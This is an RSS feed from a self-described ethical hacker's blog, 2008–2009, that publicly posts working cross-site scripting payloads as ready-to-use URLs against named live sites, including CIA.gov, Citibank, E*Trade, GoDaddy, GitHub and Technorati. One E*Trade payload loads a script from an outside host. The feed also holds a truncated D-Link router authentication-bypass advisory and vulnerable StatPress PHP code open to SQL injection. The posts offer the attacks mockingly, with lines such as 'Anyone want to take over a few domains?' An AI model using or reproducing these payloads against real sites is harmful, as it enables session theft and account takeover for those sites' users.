<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>hiredhacker.com</title>
	<atom:link href="http://www.hiredhacker.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hiredhacker.com</link>
	<description>relevant ramblings of an ethical hacker</description>
	<lastBuildDate>Tue, 15 Dec 2009 18:55:16 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>D-Link DIR-615 Remote Exploit</title>
		<link>http://www.hiredhacker.com/2009/12/15/d-link-dir-615-remote-exploit/</link>
		<comments>http://www.hiredhacker.com/2009/12/15/d-link-dir-615-remote-exploit/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:55:16 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=108</guid>
		<description><![CDATA[D-Link&#8217;s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings.
The hole is confirmed in firmware version 3.10NA.
Example (changes admin password [...]]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2009/12/15/d-link-dir-615-remote-exploit/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>GitHub XSS</title>
		<link>http://www.hiredhacker.com/2009/12/15/github-xss/</link>
		<comments>http://www.hiredhacker.com/2009/12/15/github-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:29:58 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=104</guid>
		<description><![CDATA[http://github.com/search?q=python&#38;type=Everything&#38;repo='&#34;&#62;&#60;script&#62;alert(/pwned/)&#60;/script&#62;
]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2009/12/15/github-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CIA.gov and Recovery.gov XSS</title>
		<link>http://www.hiredhacker.com/2009/12/15/cia-gov-and-recovery-gov-xss/</link>
		<comments>http://www.hiredhacker.com/2009/12/15/cia-gov-and-recovery-gov-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:24:37 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=99</guid>
		<description><![CDATA[https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)
http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=&#60;script&#62;alert('and pwned again')&#60;/script&#62;&#38;error=&#60;script&#62;alert('pwned')&#60;/script&#62;
]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2009/12/15/cia-gov-and-recovery-gov-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Wave Invites</title>
		<link>http://www.hiredhacker.com/2009/12/12/google-wave-invites/</link>
		<comments>http://www.hiredhacker.com/2009/12/12/google-wave-invites/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 13:57:53 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[wave]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=95</guid>
		<description><![CDATA[More Google Wave invites, who wants em?
]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2009/12/12/google-wave-invites/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Fun with E*Trade</title>
		<link>http://www.hiredhacker.com/2008/11/04/fun-with-etrade/</link>
		<comments>http://www.hiredhacker.com/2008/11/04/fun-with-etrade/#comments</comments>
		<pubDate>Tue, 04 Nov 2008 19:21:43 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=53</guid>
		<description><![CDATA[Most of these require the user to be logged in, and for those who don&#8217;t know, the &#8216;expression&#8217; technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples.


https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E

https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))

https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))

https://us.etrade.com/e/t/user/login?TYPE=&#038;REALMOID=&#038;GUID=&#038;SMAUTHREASON=0&#038;METHOD=GET&#038;SMAGENTNAME=&#038;TARGET=%22+style=%22width:expression(alert(/owned/))

https://global.etrade.com/e/t/intl/page?nav=3&#038;subnav=4&#038;screen=1%27;alert(/owned/);//&#038;language=en&#038;country=gl

(nav and subnav are also vulnerable parameters)

]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/11/04/fun-with-etrade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>StatPress/StatPress Reloaded &#8211; SQL Injections</title>
		<link>http://www.hiredhacker.com/2008/11/03/statpressstatpress-reloaded-sql-injections/</link>
		<comments>http://www.hiredhacker.com/2008/11/03/statpressstatpress-reloaded-sql-injections/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 16:36:27 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=82</guid>
		<description><![CDATA[iriStatAppend()

// URL (requested)
$urlRequested = iri_StatPress_URL();
...
$referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : '');
...
$insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')";
$results = $wpdb->query($insert);

iri_StatPress_Vars()

if (strpos(strtolower($body), "%thistotalvisits%") !== false)
{
    $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/11/03/statpressstatpress-reloaded-sql-injections/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Technorati XSS</title>
		<link>http://www.hiredhacker.com/2008/11/02/technorati-xss/</link>
		<comments>http://www.hiredhacker.com/2008/11/02/technorati-xss/#comments</comments>
		<pubDate>Sun, 02 Nov 2008 13:22:27 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=73</guid>
		<description><![CDATA[If anyone is interested, Technorati is full of bugs like this.


http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www.technorati.com/404please%27);alert(1);//

http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

[POST]http://www.technorati.com/account/bio/?bio_blurb=&#038;company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&#038;zipcode=&#038;country=US&#038;func=updateuser

]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/11/02/technorati-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More StumbleUpon.com Bugs</title>
		<link>http://www.hiredhacker.com/2008/11/01/more-stumbleuponcom-bugs/</link>
		<comments>http://www.hiredhacker.com/2008/11/01/more-stumbleuponcom-bugs/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 15:04:38 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=69</guid>
		<description><![CDATA[Free stumbles anyone?


http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E

http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/11/01/more-stumbleuponcom-bugs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Citibank XSS</title>
		<link>http://www.hiredhacker.com/2008/10/31/citibank-xss/</link>
		<comments>http://www.hiredhacker.com/2008/10/31/citibank-xss/#comments</comments>
		<pubDate>Fri, 31 Oct 2008 15:29:09 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=76</guid>
		<description><![CDATA[
http://www.citibank.com/domain/contact/index.htm?_u=visitor&#038;_uid=&#038;_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522

]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/10/31/citibank-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Godaddy.com XSS</title>
		<link>http://www.hiredhacker.com/2008/10/30/godaddycom-xss/</link>
		<comments>http://www.hiredhacker.com/2008/10/30/godaddycom-xss/#comments</comments>
		<pubDate>Thu, 30 Oct 2008 22:07:47 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=51</guid>
		<description><![CDATA[Anyone want to take over a few domains?


https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22

https://dcc.godaddy.com/default.aspx?activeview=transfer&#038;filtertype=3&#038;sa=%22+onerror%3d%27alert(1)%27+%22

https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1)

It&#8217;s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.
]]></description>
		<wfw:commentRss>http://www.hiredhacker.com/2008/10/30/godaddycom-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
